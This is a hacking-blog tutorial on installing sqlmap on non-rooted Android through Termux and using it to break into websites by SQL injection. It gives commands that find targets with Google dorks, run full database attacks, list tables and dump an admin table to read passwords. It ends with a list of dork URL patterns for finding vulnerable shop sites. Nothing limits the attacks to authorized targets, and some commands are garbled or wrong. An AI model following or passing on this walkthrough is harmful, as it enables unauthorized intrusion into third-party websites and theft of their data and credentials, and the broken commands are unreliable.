Welcome to HackeRoyale.

Your Website Can Be Hacked Using Android Without Root (SQLMAP Tutorial & Installation)

Hello everyone, today I am going to show you how to install SQLMAP on Android without root permission and hack website with SQL injection.

If you don’t know about SQL Vulnerability & SQL injection, then read this highly recommended SQL guide.

Basically sqlmap is designed for the Linux, and its based on some basic SQL injection vulnerabilities like blind, time-base, error-base etc. I personally found out this trick and brought it for you guys! 😛 This works with non rooted phones and it won’t need much space to install. Hardly 20mb is needed. So you can use it.

Also read: How To Hack Instagram Password & Account ? 2018 Method

Also it doesn’t need any Linux distro and all heavy files you can use it in small phones. And I personally tested it on many non rooted phone. It is working fine. The basic thing you need is brain 😛 Nothing else now! I’m not wasting your precious time more.

So let’s start!

Requirements

  • Termux (Linux terminal contain many inbuilt commands)
  • Sqlmap (Most important use for sql injection)
  • File manager (to view log & db)
  • Patience & brain 😛

SQLMAP On Android : Installation

  • First install all apps from the above links and run them at least once. Download the sqlmap zip file and extract it in sdcard and change its name.
  • After that open Termux and run given command.

apt update && apt upgrade
  • It takes some time to update. It will prompt you that some space is required. You just have to install simply, press y to yes. It takes a small amount of space for installed files.
  • If you are using Android version 6.0+ phone, then you need to run this command or if you use lower version you can simply skip. It’s not mandatory, but I suggest you to run it.

            termux-setup-storage
  •   It will prompt you to allow permission of using your internal storage. To proceed just hit the Allow button and follow the next step.

packages install python2
  •   This command will install Python in your termux. It asks you to install Python. Enter y for installing python2 in your termux.

Moving On!

  •  All set! You just need to find sqlmap.py script in your phone. In order to achieve this, navigate using cd. First you need to access root folder, so first run :
cd /

Then type & hit

cd sdcard 
cd ls 
  • It will show all contained files. Now you need to find sqlmap-master (extracted folder).
cd sqlmap-master 

cd sqlmap-master
  • Enter sqlmap-master (above command) two times.
  • If you already changed the name of sqlmap-master to sqlmap then you can run,
cd sqlmap

cd sqlmap-master
  • You can take help of  ls ” command to list down all files on that location.
  • Navigate to the sqlmap-master folder where the sqlmap.py is stored. Now to run the sqlmap you need following command :

python2 sqlmap.py
  • If you see this red color sqlmap then relax yourself! You are done with the installation of sqlmap. Now next step is hacking the website using sqlmap.
     You need to find a website with SQL vulnerability. For this, use sqlmap google dork to find websites.
  • If you are using google dork then type the following:
python2 sqlmap.py -g  your_keyword 
  • If you want to use direct URL then :
python2 sqlmap.py -u your_url
  • You can refer sqlmap official site for help or just type python2 sqlmap.py -h  for Basic helppython2 sqlmap.py -hh for Advanced help.
  • If you want to hack entire site with all database and tables just append -a to the either of the commands python2 sqlmap.py -g  your_keyword  or  python2 sqlmap.py -u your_url 
  • In google dork method,  it will give you three option : 1. Yes for attacking first site, which comes in result. For proceeding further, you need to type “y”.  2. For skipping to the next target you can use “n” 3. For quitting, use “q”.

Get Set Attack!

  • After that it will start attack on the victim site. Wait until it completes.  It may prompt you with the following question, so just simply hit “y”.

  • After that it will show you several tables and other data that it hacked. Don’t  worry, you can view it in log when process is done. 🙂
  • Now if you want to see all the tables, you need to run following command :
python2 sqlmap.py -u url --tables

  • It will return all tables name that are already hacked by sqlmap. Now choose the table you want to view by simply entering the following command. In my case I want to view the admin table. To view password, I run
python2 sqlmap.py -u url -T your_table name
cp source //sdcard
  • Just replace the source with source given by terminal in above command it will omit the dump file but don’t worry we don’t need it now navigate to the file using your inbuilt file manager or use ES file manager

  • Congo! You successfully hacked a  website using sqlmap with sql injection on Android.

Also readTop Best Hacking Tools For Linux, Windows And Mac OS X In 2018

Dorks

I’m giving below some important dorks here, so you can find SQL vulnerable sites easily!

add-to-cart.php?ID=

addToCart.php?idProduct=

addtomylist.php?ProdId=

adminEditProductFields.php?intProdID=

advSearch_h.php?idCategory=

affiliate.php?ID=

affiliate-agreement.cfm?storeid=

affiliates.php?id=

ancillary.php?ID=

archive.php?id=

article.php?id=

phpx?PageID

basket.php?id=

Book.php?bookID=

book_list.php?bookid=

book_view.php?bookid=

BookDetails.php?ID=

browse.php?catid=

browse_item_details.php

Browse_Item_Details.php?Store_Id=

buy.php?

buy.php?bookid=

bycategory.php?id=

cardinfo.php?card=

cart.php?action=

cart.php?cart_id=

cart.php?id=

Thanks for reading this very first article by me! Just remember

Also, read our other articles on SQL Injection :

SQL Injection Without Any Tool!

Hacking sites using DroidSQLi (SQL Injection) on Android

See You Soon!

Tags:
Android anonymity bug cmd commands dark web ddos deep web DNS encryption facebook fbhacks footprinting ftp Hack hacker Hacking info gathering kalilinux keyloggers links malware metasploit password payload phishing proxy root safety sniffing Social Engineering sql tools tor tutorials vpn vulnerability web-hacking wifi-hacking windows wireless hacking wireshark xposed xposed framework xposed modules

SIGN UP FOR OUR MAILING LIST!

Facebook
Twitter
LinkedIn
featured posts
PUBG Mobile Hack, aimbot, wallhack and other cheat codes [2018]

PUBG MOBILE Hack, Aimbot, Wallhack and other cheat codes (2022)

How To Hack Instagram Account Password Account

How Your Instagram Account Password Can Be Hacked - [The Ultimate Guide 2022]

hack facebook account password online

Top 5 Ways Your Facebook Account Password Can Be Hacked Online : 2022

Shadowave apk - hack fb id by sending link

Shadowave : Your Facebook ID Can Be Hacked By Sending Link

Deep Web Links

Deep Web Onion Links Grand List 2019 [8000+ Uncategorized Links]

Termux Hacks Guide [2018] : Tutorial, Commands List, Tools, Apk, Uses, Packages

Termux Hacks Guide [2022] : Tutorial, Commands List, Tools, Apk, Uses, Packages

free netflix accounts passwords hacks

How Hackers Get Netflix for Free – Netflix Account & Password Hacks [2022]

hack facebook account password using phishing

How Anomor Can Be Used To Hack Your Facebook Account – Tutorial [Part 1]

How To Hack Any Facebook Account Using Kali Linux: Tutorial

How Facebook Can Be Hacked Using Kali Linux Brute Force – Working Method [2019]

How To Hack WiFi Password On Android with/Without Root? : 2018

How Your WiFi Password Can Be Hacked On Android with/Without Root? : 2022

Your Website Can Be Hacked Using Android Without Root (SQLMAP Tutorial & Installation)

How To Hack Twitter Account Password Without Them Knowing [Tutorial 2018]

How Twitter Account Owners’ Passwords Get Hacked Without Them Knowing [Tutorial 2019]

categories

ABOUT US

HackeRoyale is a web site by and for hackers and security leaders devoted to making the Internet a safer place. Complete with text, graphic, and video content, our goal is to inform, advise, and exploit for the aforementioned purposes.

CONTACT US

© Copyright 2022 | HackeRoyale | HackeRoyale.com | All Rights Reserved

SUBSCRIBE FOR UPDATES

Get weekly updates by subscribing to our newsletter.